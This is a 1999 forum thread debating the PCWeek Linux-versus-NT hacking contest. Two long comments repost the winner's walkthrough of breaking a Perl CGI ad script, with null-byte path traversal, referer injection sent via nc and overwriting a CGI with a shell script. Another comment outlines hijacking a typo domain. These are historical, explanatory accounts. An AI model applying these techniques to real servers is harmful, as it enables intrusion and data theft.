PCWeek "Hack This Page" Cracked

mrflip writes "On September 20th, PCWeek announced a $1000 contest to be the first to hack either the linux or the NT server they set up. Well, four short days later, the linux box seems to have been compromised. The winner states "Hi guys, It's been a nice challenge, now send me the cash :)." He explained that the exploit was not a linux feature but was due to a closed source CGI script with improper security checks. " Going to require Solomonic ruling - the intent was to test the two OSes, and this is obviously not an OS test.

Re:[offtopic] a gender neutral way to say it

The `or she' is redundant. In correct, formal English, `he' is used in both the masculine and unspecified cases. In informal usage, `they' is perfectly acceptable for the unspecified case, and has been for centuries.

Re:Sour Grapes - linux lost

Red Hat is Linux.

Re:CGI Script Security

I'm not familiar with Red Hat 6.0, anybody know of any closed source CGI scripts installed by default? And just why do you need any default CGI scripts in the first place? The first thing any competent web admin should do is go into the cgi-bin directory and at the least remove execute permissions from all CGI scripts until they have had time to look over the code and understand what the CGI script does. It's even worse that Red Hat would put a closed source CGI in there.

Web servers are run as user nobody so that they can't compromise the system. You generally don't make files owned by nobody, unless you want to get owned by some script kiddie. I don't think even Red Hat would be stupid enough to set up the directory permissions as with write access for everybody. Probably a SUID CGI script. Hopefully not owned by root.

I'll install my own web server, thank you.

These aren't the crackers you're looking for

[Foz]

These "hack this box" attempts are nothing more than publicity stunts, meant to satisfy a particular political agenda. They prove nothing technically.

These stunts generally only attract script-kiddies... a population against which any reasonably competent sysadmin can protect themselves against with a fair amount of effectiveness no matter WHAT their OS is (yes, even NT).

The type of cracker that doesn't go in for these cheap publicity shots is the type that you really need to be worried about anyway, and those crackers will penetrate your defenses no matter what you do to stop them.

For an interesting read on the type I'm referring to, check out the 8 second crack article on the internet auditing project. It's a long (but interesting read), the particularly juicy part is down in the Third week section.

That kind of cracker doesn't particularly care which OS you're running, they'll drop you in your tracks no matter what.

-- Gary F.

Re:Can you say "one-track mind"?

[dave256]

• Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL, all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a password. If you wanted Linux to be more secure, you could try making it easier batten down the hatches.

Something that I think a lot of people fail to forget is the fact that linux is not a desktop OS (yet). As things stand now, linux is a server. It doesn't "do" games linux windows, it doesn't "do" the common desktop things like windows does. Face it. In the area of mass induhvidual usage, windows has the market.

But Dave! What of GNOME and KDE? I shall enlighten you. They are wonderful. They are ubercool. But have you ever tried to sit a newbie down in front of gnome and explain the concept of "multiple desktops" and the "pager" to 'em? The reason linux is harder to secure is because most distributions' default install starts up all sort of unrequired stuff, because, generally.. well, really, I have no idea why they start it up. When installing windows, you don't have to worry about a FTP server, or a NFS server, or a NIS/NIS+ server, or a DNS (would you like caching with that?) server, or a ...


I want a rock.

Re:No one has hacked the NT machine ...

[Alascom]

That rant of yours in very funny. Let me explain that securent.hackpcweek.com IS vulnerable. The problem isn't NT however, its in the HTML code on the server. Similarly, the Linux wasn't vulnerable, but the CGI script was. YES, SECURENT CAN BE HACKED. You heard it here first. The rules state: break into the system, modify pages, and/or steal user information. Well, according to those rules it can be broken. Let me explain. I examined the SECURENT html source and noticed several links to "www.hackpcweek.com.com" (notice the extra .com). Then I contacted Curt Connell with EDS who is Administrative contact for COM.COM. (Please don't call or bother him anymore). A simple 'A' record in the .com.com DNS server refering 'www.hackpcweek.com.com' to my own web server would allow me to steal user information. Whats more, the user would believe they were still on a real "pcweek" server seeing valid pcweek documents, allowing me to send malicious code, request confidential information, etc. Curt was unable to get "official" EDS permission to create the 'A' record, but the hack is valid and does exist. (Again, please do not bother Curt anymore). A simple goof in the HTML code renders the NT box 'hackable'. A side benefit is we circumvent the Firewall, IDS and other security features by just directing to another site. Oops. The NT 'IS' vulnerable to attack. In closing, don't consider an operating system insecure based on the applications (or HTML) thats on it. -Alascom alascom@dc2600.com

Re:Too many variables

[zarcher]

>Question- if the same CGI script(s) were running on both systems, why didn't it fail on the NT system as well?

They didn't run the same application on both servers.

Here is a quote from a ZDNet

On each of the servers we loaded similar applications. For NT, we developed a classified-ad engine based on a Microsoft Guestbook application. For Linux, the Labs chose Smart Photo Ads, a popular classified-ad engine for the platform. Both the NT and Linux apps have stored user names, which represent proprietary data and require sites to maintain a secure status.

They go into other details on the page.

Good for Linux in the long run

[rmcd]

Seems to me that this is what linux advocates should want: direct, high-profile comparisons to NT. That's how you get mindshare. This won't be the last test like this. NT will "win" some, Linux will "win" some, there will always be arguments about how the test was conducted. But it will get people thinking that it's reasonable to speak of both OS's in the same breath.

Re:...Jesse Burst?

Berst? Pro-MS? Hardly. Berst is just a dumbass.

Re:Why isn't a Mac involved?

macs are secure by default because the have no services. MacOS was designed as a desktop OS, not a server os. If I shut down all the services on my NT,Linux box they would be pretty secure too. Dont get me wrong, I love macs. Wish I had a G4.

astroturf campaign continues

there are more astroturfers in this thread than fbi agents on irc.

Re:: No one has hacked the NT machine

[Alascom]

That rant of yours in very funny. Let me explain that securent.hackpcweek.com IS vulnerable. The problem isn't NT however, its in the HTML code on the server. Similarly, the Linux wasn't vulnerable, but the CGI script was. YES, SECURENT CAN BE HACKED. You heard it here first. The rules state: break into the system, modify pages, and/or steal user information. Well, according to those rules it can be broken. Let me explain. I examined the SECURENT html source and noticed several links to "www.hackpcweek.com.com" (notice the extra .com). Then I contacted Curt Connell with EDS who is Administrative contact for COM.COM. (Please don't call or bother him anymore). A simple 'A' record in the .com.com DNS server refering 'www.hackpcweek.com.com' to my own web server would allow me to steal user information. Whats more, the user would believe they were still on a real "pcweek" server seeing valid pcweek documents, allowing me to send malicious code, request confidential information, etc. Curt was unable to get "official" EDS permission to create the 'A' record, but the hack is valid and does exist. (Again, please do not bother Curt anymore). A simple goof in the HTML code renders the NT box 'hackable'. A side benefit is we circumvent the Firewall, IDS and other security features by just directing to another site. Oops. The NT 'IS' vulnerable to attack. In closing, don't consider an operating system insecure based on the applications (or HTML) thats on it. -Alascom alascom@dc2600.com

Horsefeathers.

ZDnet setup Linux ... Again !!! What if you put a secure CGI program on Linux and a bad one on NT? I'd bitch too. Linux kernel is not responsible for a poorly written CGI. Hell, you can write a CGI program to do whatever you want.

Re:Why isn't a Mac involved?

[mrowlands]

Maybe because there are no Mac servers out there?

Re:What if IIS had the hole?

[witz]

That doesn't denote OS integration, it denotes a lack of cross platform availability. Don't confuse the issue.

Re:That's it!

*chokes on laughter spittle and dies* Not that I can talk. I only use my linux box for personal computing, like most windows users do. I have my root's password set to, er, password and I've never changed it. Also, I have a file named passwords in root's home... I think you can guess the contents. But don't expect to hack in. I won't care. And what do I care? I can just format everything and start over. Hell, if you gave me that linux box to administer, I would probably chmod 777 *. Well, I probably would by accident even if I didn't get ordered to, for "FUDA." (FUD Ammunition) Oh yeah, and some of these Linux people are going a little... overboard, but this contest really didn't prove anything, I mean HELL, it was a CGI script that got broken into!

Re:CGI Script Security

if the CGI script was owned by nobody than it is logical the webpage was also owned by nobody and possible had the permissions 4600, therefore, the CGI script had possible write access to the webpage.

No, it's not logical at all. Why would you run a webserver as a different user and then chown all the files in htroot to that user's ID?

What's the point? The idea is to do damage control and so the webserver's uid (nobody) shouldn't have any rights to do anything else.

Re:Troll

This has nothing to do with Unix security. Obviously the admin didn't bother to set up any security. If the script was running as "nobody", it would be nearly impossible to crack the system with it. Unix security could be better, but setting it up correctly would have prevented this crack.

Re:OS security?

[sterwill]

Linux did not lose. A CGI script lost.

--

Re:Can you say "one-track mind"?

[platypus]

Cool, someone else who noticed that. That's the bass thingie, I wondered why nobody seemed to have noticed this before.
Last year, someone on alt.hackers.malicious bothered everyone when he posted his ip-adress and told the people they would not be able to hack him, because his nt-box was so secure. This happens always by someone who wants to get somone else in trouble, but this time it was really the guys own machine.
Three day later he posted from a different os (w95) and told that someone had broken into his machine and wiped his hd. He continued to say that this guy had contacted him afterwards and that this guy was a security pro. The pro explained him that he didn't have any chance from the beginning, despite following all ms security advisories - thats the joy of black box systems...

Re:I find it interesting that ZDnet ruled out...

"Since vanilla NT has virtually no remote administration or remote anything capabilities, it had a natural advantage in this test."

Bullshit. Put RAS on there, get a trusted connection and you can remotely administer just about anything on an NT machine. I do it all day everyday, as well as from home to work, quite often though I love when Linux zealots tell me it can't be done.

Re:Sour Grapes - linux lost

> Red Hat is Linux.

*sigh* Too... stupid...

Linux= Godlike OS.
Red Hat= Company.
Red Hat Linux= Linux DISTRIBUTION. (Not very secure, I suppose, but I dunno.)
Distribution= Linux with various programs/scripts, variables set for easy usage, etc. Basically, a kitted out version.

Type cast incorrect for assertion. (Company, Godlike OS.) (Yes, this is a screwed up C error msg.

Re:NT admin

NT admin
ROFL

That's exactly the sort of comment that exemplifies the general Linux community. Can't win in the real world so either propagate FUD or just claim some etheral superiority. The humor is the fact that only your fellow Linux lackies believe it: The rest of us are laughing our asses off at you.

All OSs are insecure

Look at attrition.org. They all get 0wn3d: NT, Linux, Solaris, FreeBSD, OpenBSD, etc.

NT's biggest problem isn't security (although that is a problem); it's stability.

Re:Hacking CGI is fair

Yep, Satan is a pretty, um, specialized tool. (Yes, I realize that you are just talking about the utility. I am just being a jerk. But you probably knew that.)

Re:Can you say "one-track mind"?

[Tony-A]

NETWATCH.EXE
It is in the NT Server Resource Kit.
You can see who is accessing your (or anyone elses) files. Actually can be very useful.

Re:[offtopic] a gender neutral way to say it

Actually, since it was one person who cracked, you would have to use she/he.

Oh, do linux installations ...

[ghazban]

come with those cgi scripts automatically installed? I don't think so, thus it is not a problem with an out of the box distro, but rather their (or someone elses) programming.

Re:Well what did THIS prove?

[mlefranc]

I quite agree. However, whereas this does not prove anything regarding Linux, it certainly does prove something regarding the Red Hat secure server as it was shipped until now (I guess there will be some updates in a near future)

P.S. Any news regarding the 'RedHat Linux on NT' diagnostic by netcraft ?

People count

[platinum]

A system's security is only as good as it's administrator.

Re:People count

[Signal+11]

... of course having an OS with holes big enough to drive a bus through doesn't help matters.

--

Re:People count

[solar]

For a flame-baiter, you sure have a hard time detecting flame-bait...

Re:People count

[solar]

I'm quoting this from the "hack this whatever its called" website: >>Finally, here's one last tidbit of information... pcweek is owned by Ziff-Davis publishing >>Excerpt from the ZD home page >>Ziff-Davis is a publicly traded company listed on the New York Stock Exchange >>(NYSE). A majority interest is owned by SOFTBANK CORPORATION. >>SOFTBANK is Japan's largest distributor of computer software... >>Excerpt from Microsoft's home page >>REDMOND, Wash. - March 24, 1999 - Microsoft Corp. today announced it has >>signed a memorandum of understanding to enter a joint venture with Softbank >>Corp. and Yahoo! Japan to create the Japanese version of the MSN CarPoint >>online service...The initial capital of the new company will be $7 million, with 50 >>percent of its common stock owned by Softbank, 40 percent by Microsoft and 10 >>percent by Yahoo! Japan. Masayoshi Son will be CEO and president of the new >>company... >>Excerpt from the ZD home page-- >>ZIFF-DAVIS INC. >>DIRECTORS AND EXECUTIVE OFFICERS >>Masayoshi Son >> Director Draw your own conclusions, free thinkers....

Re:People count

A system's security is only as good as it's administrator.

Although this is fundamentally true, we need to be careful making this argument, as it plays directly into Windows NT's marketing strategy.

The fact is that all of Microsoft's recent success -- especially with respect to Windows NT -- can be attributed to the successful marketing of a single message:
Any idiot can run Windows NT. It takes a genius to manage Unix.

The appeal of this message to IT directors and CIOs is clear. MS has successfully planted the meme that a company can get more done with 2 green MSCEs at $35k per year than with one seasoned Unix admin at $75k per year.

Of course, those of us who are in the trenches with NT and Unix on a day-to-day basis know that this argument is a load of fetid dingo's kidneys, but we're not the ones who make the enterprise architecture decisions... and Microsoft is taking full advantage of that fact.

The challenge for the Linux and Unix community is to demonstrate the fallacy of Microsoft's message -- to show that "Wizards" and other GUI sleight-of-hand are not a substitute for knowledge and experience. How to do this? I don't know. NT directors and CIOs don't like to admit they've been snowed by crafty salesmen.

Re:People count

Dude, this ain't the X-Files. There is no conspiracy. Get over it.

Re:People count

YES!! My sysadmin at my school can barely read, denies public access to the web server (port 80 FIREWALLED) and uses Windoze!!. He also uses Solaris 2.1 (for telnet, of which the root passwd is root :-))! Dumb sysadmins = insecure computers!

Re:People count

[Zurk]

Author: pankaj (10.0.0.1)
Date: 09-25-1999 00:16

Kudos to Jfs, here are the detail straight from the horses mouth. We'll post them on the Linux site homepage later

First of all, I had to gather information on the remote host, what ports the machine had open and what possibilities were
left open. After checking that most of the ports were either filtered by the firewall or unusable due to the tcp
wrapper in the host, I decided that I was left only with the HTTP server.

lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
POST X HTTP/1.0

HTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
Connection closed by foreign host.
lemming:~#

So, it was running apache on a Red Hat box. The webpage said that the server will also run mod_perl, but mod_perl leaves
a fingerprint in the Server: header which was not shown in the header that this server sent out.

Apache 1.3.6 doesn't ship with any CGI programs available to the remote user, but I didn't know about the RH distro, so I
gave the common faulty CGIs a try (test-cgi, wwwboard, Count.cgi...)

After no results, I tried to find out what the website structure was, gathering information from the HTML pages, I found
out that the server had this directories under the DocumentRoot of the website:

/
/cgi-bin
/photoads/
/photoads/cgi-bin

So I got interested in the photoads thingie, which seemed like an installable package to me. After some searching on the
WWW I found out that photoads was a commercial CGI package from "The Home Office Online"
(http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check
and modify it.

I asked a friend if he would let me gave a look at his photoad installation
and this is how I got access to a copy of what could be running in the securelinux machine.

I checked the default installation files and I was able to retrieve the ads database (stored in the
http://securelinux.hackpcweek.com/photoads/ads_dat a.pl) with all the user passwords for their ads. I also tried to access
the configuration file /photoads/cgi-bin/photo_cfg.pl but because of the server setup I couldn't get it.

I got the /photoads/cgi-bin/env.cgi script (similar to test-cgi) to give me details of the server such as the location in
the filesystem of the
DocumentRoot (/home/httpd/html) apart from other interesting data (user the
server runs as, in this case nobody).

So, first things first, I was trying to exploit either SSI (Server side includes) or the mod_perl HTML-embedded commands,
which look something like:

for SSI
for mod_perl

The scripts filtered thsi input on most of the fields, through a perl regexp that didn't leave you with much room to
exploit. But I also found a user assigned variable that wasn't checked for strange values before making it into the HTML
code, which will let me embed the commands inside the HTML for server side parsing:

In post.cgi, line 36:
print "you are trying to post an AD from another URL: $ENV{'HTTP_REFERER'}n";

The $ENV{'HTTP_REFERER'} is a user provided variable (though you have to know a bit of how HTTP headers work in order to
get it right), which will allow us to embed any HTML into the code, regardless of what the data looks like.

Refer to the files getit.ssi and getit.mod_perl for the actual exploit.
To exploit it, do something like:

lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

But unfortunately, the host didn't have SSI nor mod_perl configured, so I
hit a dead end.

I decided to find a hole in the CGI scripts. Most of the holes in perl scripts are found in open(), system() or `` calls.
The first allows reading, writing and executing, while the last two allow execution.

There were no occurrences of the last two, but there were a few of the open() call:

lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)

There was nothing to do with the ones referring to $BaseDir and $DataFile as these were defined in the config file and
couldn't be changed in runtime.
Same for the $mailprog.

But the other two lines are juicier...

In photo.,cgi, line 132:
$write_file = $Upload_Dir.$filename;

open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);

So if we are able to modify the $write_file variable we will be able write to any file in the filesystem. The $write_file
variable comes from:

$write_file = $Upload_Dir.$filename;

$Upload_Dir is defined in the config file, so we can't change it, but what about $filename?

In photo.cgim line 226:
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }

$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+([^]+)$|.+/([^/]+)$/1/;

if ($filename =~ m/gif/) {
$type = '.gif';
}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
}else{
{&Not_Valid_Image}
}

So the variable comes from $UPLOAD{'FILE_NAME'} (extracted from the variables sent to the CGI by the form). We see a
regexp that $filename must match in order to help us get where we want to get, so we can't just sent any file we want to,
e.g. "../../../../../../../../etc/passwd", cos it will get nulled out by the substitution :

$filename =~ s/.+([^]+)$|.+/([^/]+)$/1/;

We see, if the $filename matches the regexp, it's turned to ascii 1 (SOH).
Apart from this, $filename must contain "gif" or "jpg" in its name in order
to pass the Not_Valid_Image filter.

So, after playing a bit with various approaches and with a bit of help from
Phrack's last article on Perl CGI security we find that

/jfs/../../../../../../../export/www/htdocs/index. html%00.gif

should allow us to refer to the index.html file (the one we have to modify, the main page in the web server).

But then, in order to upload we still need to fool some more script code...
We notice that we won't be able to fool the filename if we send the form in
a POST (the %00 doesn't get translated), so we are left out with only a GET.

In photo.cgi, line 256, we can see that some checks are done in the actual content of the file we just uploaded (:O) and
that if the file doesn't comply with some specifications (basically width/length/size) of the image (remember, the
photo.cgi script was supposed to be used as a method to upload a photoad to be bound to your AD). If we don't comply with
these details the script will delete the file we just uploaded (or overwritten), and that's not what we want (at least
not if we want to leave our details somewhere in the server :).

PCWeek has the ImageSize in the configuration file set to 0, so we can forget about the JPG part of the function. Let's
concentrate on the GIF branch:

if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
$PhotoHeight = $height;
$PhotoSize = $size;
return;
}

and in photo.cgi, line 140:

if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}

if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}

So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default).

So we are left with $PhotoWidth != "" && $PhotoWidth

Re:People count

[Zurk]

So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default).

So we are left with $PhotoWidth != "" && $PhotoWidth 350 .
For $PhotoHeight it has to be smaller than $ImgHeight (250 by default).

So, $PhotoWidth == $PhotoHeight == 0 will do for us. Looking at the script that gets the values into those variables, the
only thing we have to do is to set the values in the 6th to 9th byte to ascii 0 (NUL).

We make sure that we put our FILE_CONTENT to comply with that and proceed with the next problem in the code...

chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");

Show_Upload_Success($write_file);

Argh!!! After all this hassle and the file gets renamed/moved to somewhere we don't want it to be :(
Checking the $AdNum variable that gives the final location its name we see that it can only contain digits:

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+?%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};

Anything else gets removed, so we can't play with the ../../../ trick in here anymore :|

So, what can we do? The rename() function expects us to give him two paths, the old one and the new one... wait, there is
no error checking on the function, so if it fails it'll just keep on processing the next line. How can we make it fail?
using a bad file name. Linux kernel has got a restriction on how long a file can be, defaults to 1024 (MAX_PATH_LEN), so
if we can make the script rename our file to something longer than 1024 bytes, we'll have it! :)
So, next step we pass it a _really large_ AD number, approximately 1024 bytes long.
Now, the script won't allow us to process the script as it only allows us to post photos for ADs number that do exist...
and it will take us a hell of a lot of time to create taht many messages in the board 10^1024 seems quite a long time to
me :)
So... another dead end?

Nah, the faulty input checking functions let us create an add with the number we prefer. Just browse through the edit.cgi
script and think what will happen if you enter a name that has a carriage return in between, then
a 1024 digits number? :) We got it...

Check the long.adnum file for an exploit that gets us the new ad created.

So, after we can fool the AdNum check, the script makes what we do, that is:

Create/overwrite any file with nobody's permissions, and with the contents
that we want (except for the GIF header NULs).

So, let's try it

Check the overwrite.as.nobody script that allows us to do that.

So far so good. So, we adjust the script to overwrite the index.html web page... and it doesn't work. Duh :(
It's probably that we didn't have the permission to overwrite that file (it's owned by root or it's not the right mode to
overwrite it). So, what do we do now? Let's try a different approach...
We try to overwrite a CGI and see it we can make it run for us :) This way we can search for the "top secret" file and
we'll get the prize anyway :)

We modify the overwrite script, and yes, it allows us to overwrite a CGI! :)
We make sure we don't overwrite any important (exploit-wise) CGI and we choose the advisory.cgi (what does it do anyway?
:)).
So, we will upload a shell script that will allow us to execute commands, cool...

But then, when you run a shell script as a CGI, you need to specify the
shell in the first line of the script, as in:

#!/bin/sh
echo "Content-type: text/html"
find / "*secret*" -print

And remember, our 6th, 7th, 8th and 9th bytes had to be 0 or a very small value in order to comply with the size
specifications...

#!/bi

Re:People count

[md_doc]

In this case it was a programmer who is probably a windows programmer just converted a cgi over really fast to work on linux. Woo-hoo and you wonder why hacks are bad? Please take pride in your programming. I am sure this is not how pcweek had wanted this to end either.

--MD--

Re:People count

[Melkman]

Yup, and as much as I hate to say it: I told you so.. You could see this comming miles away.

Re:People count

These Linux (i.e. anti-Microsoft) fanatics really are barmy. They act as if an operating system is some sort of cult, and think everyone else is the same way.

Re:Troll

This has nothing to do with Unix security.Obviously the admin didn't bother to set up any security.

Of course it has. With Inferno for instance you would have run the script with an empty name space (the script can only access to an empty directory and nothing out of this), and it won't matter if you are user sys, nobody, or god. You can achieve the same thing by doing a chroot on your script, but then your server need to be running as root, and some problems appears. Because chroot brings too much problems, it is not used as much as it should. Because Inferno namespaces are properly implemented, they would be the default on any server using CGI scripts. Security by correct design.

If the script was running as "nobody", it would be nearly impossible to crack the system with it.

First you are assuming that no setuid program is available that has problems (which I doubt). Second you are assuming that reading some files is not a problem, which I disagree (for instance, some files could hold password, used by other authentification CGI scripts, run as "nobody").

You can make a Unix installation secure (with chroot, directory changes, etc...), but the problem is that you have to go through an exhaustive examination of possibilities (you must set all the directory/files user/group/public rights correctly, and check that all the scripts create files with proper rights). The problem is: everything that is not explicitly checked and forbidden might be exploitable. Compare with Inferno security, when you empty the namespace of a process: everything that you have not explicitly allowed is not doable. Unix is insecure by default, but can be secured by exhaustive review. This is not a good security model.

Unix security could be better, but setting it up correctly would have prevented this crack.

It should have been set correctly by default. It wasn't, because it is inconvenient, or not possible (the CGI author, doesn't know how 'nobody' is used on the host machine [could be used for printing, etc..]. Only the admin knows, and has to review everything).

Re:Dan Attenborough

[DrMaurer]

Thanks for responding
It must be tested
Totally agree.
I hope Linux comes out on top ...I sincerely believe that it will ...but it's my responsibility to be open to an alternate outcome.
Okay, I was responding to one point in your post, we both know this, and I know that you didn't mean it quite the way it came out, but I still felt inspired. It's not often that I do that, well, at least as effectively.
The most secure OS will win, and we ALL know that that hasn't come out yet.
Linux isn't it, WinNT isn't it, Mac isn't it, BeOS isn't it(not much of a server even, but it's not made for that, which is another point, but I like mentioning my fav OS in any post:), FreeBSD isn't it.
Any system that is turned on is insecure. We all know this. It's the first rule of computer security. However, all solutions must be tested fairly.
I'm all for these competitions, not because today the NT folks come out on top and tomorrow Linux will, and so on, and their respective zealot users will still bicker and post on comp.os.*.advocacy. As long as the coders and testers and hackers (the survival of the fittest element) realize what's going on, I think these contests do nothing but help.
For *'s sake, it's just an operating system!
Just because I'd build a machine for my girlfriend and put windows on it doesn't mean windows is the end all/be all. Just cuz I'd choose Be as my desktop and Linux as my local server, doesn't mean anything!
Security is everyone's buisiness, not just the NT or the *nix folks or the mac folks either. When one site gets hacked, there's something wrong, fix it, no matter the OS.
This pesky OS battle shit is dumb and we all know it, even if we continue with our little Linux/Be/Win/Mac/BSD/Amiega/Unix/(brand new thing here), we need to get our heads out of our ass and realize that command prompt or mouse pointer, there's work to do.
For some of us that's security and stability issues. For others it's just to type a memo, for others still it's the great american novel or CD of the year.
Have a nice day.

Pay up, fix the problem and try again

[flatrock]

The test has some flaws. They should pay the winner, fix the faulty CGI script, and try again.

Re:Can you say "one-track mind"?

Ummmm.... first, try subscribing to NTBugtraq - not sure what newsgroup you are reading but try NTBugtraq for some fun daily reading of M$ holes in NT, IE, and IIS. As a counterpoint, you can also read the general Bugtraq - which has plenty of holes in Linux and Unix listed as well. You are right about some of the Linux flamers who won't listen to reason, but even a short study of computers will show you that NT will never be as secure as *nix - it's a system architecture thing. Having said that, no system is totally secure and bad admins or users can undermine the best of security.

Re:[offtopic] a gender neutral way to say it

[mpe]

Referring to a single person of unknown gender as "they" is common slang but is not correct english.

Or maybe it's just incorrect in the American dialect of English especially since the FAQ reference given is to an American site.
Note that in English there is at least one other example of a supposedly plural pronoun being used as singular. Though you have to be the monarch to do so.

Too many variables

[.havoc]

Unless both systems were running the same web server, and the same set of scirpts, the whole contest is really irrelivant. Until they install Apache on both boxes and choose a common scripting platform, they are wasting everyone's time.

Re:Too many variables

[metasim]

Regardless of how they go about it, they are still wasting everyone's time. Like you said, there are too many variables (e.g. competency of administrator) to make any of these security competitions interesting, although the LPPC one was about as good as it gets due to the "out of the box" criteria. What are we trying to prove? That M$ sucks technologically? If that is the case, I think the point has been missed as to why M$ is where it is.

Re:Too many variables

[pdk]

Marketing ... pure and simple. And if conspiracy theorists contribute, the right amount of money in the right hands at the right time.

Re:Too many variables

Oh come on, listen to what you are saying. There is no way thatany two OSes could have the same configuration, esp two as disimiliar as linux and NT. I think that the test is extremely valid as it mirrors a real world situation. I am sure that the ppl at PCWeek took care to make the tests as fair as possible (security fixes etcc...), ZDNet has been covering and supporting linux for some time now, more than most... of course that might be beucase of association with hype.... :( Oh well Nathan(sorry for the AC to lazy to log in) "I don't measure a man's success by how high he climps but how high he bounces when he hits bottom." -- General Patton

Re:Too many variables

[KrAphtd1nN3r]

Even then, it would be biased. Apache is far better on a Unix platform than on a Windows machine!!


"Code free or die!"

Re:Too many variables

Hmmm.

Those are mighty sour grapes there....

Question- if the same CGI script(s) were running on both systems, why didn't it fail on the NT system as well?

Could it be that since the services are wide open on a Unix system once security is breached (single point of vulnerability- access to root), while it's more difficult to do as much through remote access on an NT system (granular security model, no remote access command prompt by default), that the faulty CGI script is a far more serious problem on Linux than on NT?

Since I don't know all the details of the failure (the links in the story point to an infantile "did too!/did not!" discussion thread) it's hard to discern the details of the test.

Re:Too many variables

The mindset of the Linux nutter is that when Linux loses (as it often seems to), the test was unfair and/or part of a vast, dark conspiracy directed by Microsoft. They're fanatics on a Jihad; they don't have to be rational, just noisy enough to draw attention to their cause.

Always good for a laugh, though, I must say.

PS Perhaps I'm part of that very conspiracy, eh?

Re:Can you say "one-track mind"?

[Dr.+Evil]

For the same reason as I said above, as well as the fact that most Windows users probably wouldn't notice the fact that they'd been cracked. They can't simply type "w" and see who's logged in, and they're more used to seeing their computer slowing down and having the drives running for god-knows-what-reason. Last time I was using a cable modem, there were several dozen machines that would've been rather easy to get into because they had their drive shared without a password. Short of deleting all the files, how would any possibly know I was in their stuff? They wouldn't. And even if I deleted any of their files, without the logging present like there is under Unix, they wouldn't be able to figure out that it was an external user that wiped the files, and not some wierd glitch in the system.

Actually, NT's file auditing features are great. The NT security model is very smooth on the small scale. I mean, within the server and for remote connections to the server. They're just not turned on by default... but neither are Linux's.

Credit where credit is due. The fact of the matter is, unless this CGI hack managed to somehow dig out a root exploit from a non-privilidged account, this was not an OS bug. Linux as an operating system DOES protect against this sort of thing. There is no reason whatsoever that the files should have been capable of being modified by the user of the CGI application. The fact of the matter is that the operating system was not configured at all for security. They relied 100% on the CGI application to defend their files.

A non-privilidged application had a bug in it which allowed someone to modify unprotected files. Quick, send out the CERT advisory!

Re:PHEAR! Let's examine the facts, first

[mpe]

Linux is not that easy to setup securely. And obviously, looking at the LONG list of non-standard changes made to the NT box, neither is NT.

If you are making "non standard" changes with the idea of increasing security you had best know exactly what you are doing. Otherwise the most likely result is less security.

Pay up to the guy that got in. Then fix the flawed CGI (or release the source so that somebody who's competant can), and run it again.

Or if they don't want to release the source of the CGI ,remove all CGI's from both machines which arn't either standard or OSS

...

[Signal+11]

cut to the next Jesse Burst article..

... It's the responsibility of the Operating System to ensure security. blah blah blah.. It is obvious that linux does not have Enterprise-level reliability. blah blah blah... blah blah.. IIS is better than Apache... blah blah... The problem here is that the user doesn't have access to a GUI, and thus can't see problems like this... blah blah blah... Of course Microsoft would have released a service pack by now - what does the Linux offer? A cryptic "patch" option. They should have an easy-to-upgrade "click here to compromise your security" feature like NT does... blah blah blah...tune in next week for 'Why I'm so cool, and you're so not.'

--

Re:...

[zempf]

cut to a Jesse Burst article 3 months later...


..Linux is the wave of the future...blah blah blah...open source is the way to go...blah blah blah...

:)

-mike kania

Re:...

>blah blah blah...tune in next week >for 'Why I'm so cool, and you're so not.' that's not jesse berst, that's jwz...

Re:...

[Morpheous]

That is really funny. I used to subscribe to the Berst Alert way back, but I was quickly turned off by his arrogance. The newsletters would start off with something like, "Last weekend, while I was giving the keynote address at such-and-such expo..." Not to mention that the newsletters were devoid of any real content. I quickly unsubscribed, and never went bact to ZDNet again...

--"A man's Palm is his best friend."

The Art of FUD

[LoppEar]

I agree with your viewpoint on a typical Linux system shown to be less secure. I don't think this reflects on the OS or the principles behind it though.

Rather, I believe that Linux can be at least as secure (and much more quickly fixed) as NT. As numerous people have mentioned, it is a matter of the people administering the system not taking the proper steps. But I don't think this necessarily reflects on them either. (Well, in the case of these "tests" I think it is sloppy. I'm talking about general use of the OSes.)

My concern lately has been on user education. People have to know what they can do to improve their systems, that it is not the OSes fault but simply corrections that need to be made in the setup. I'm not sure about how this user education should occur, but I know it is important. Both Linux and MS zealots will use the latest error-filled results to push their platform, but the end user is not helped by choosing either of these without education about what each really entails.

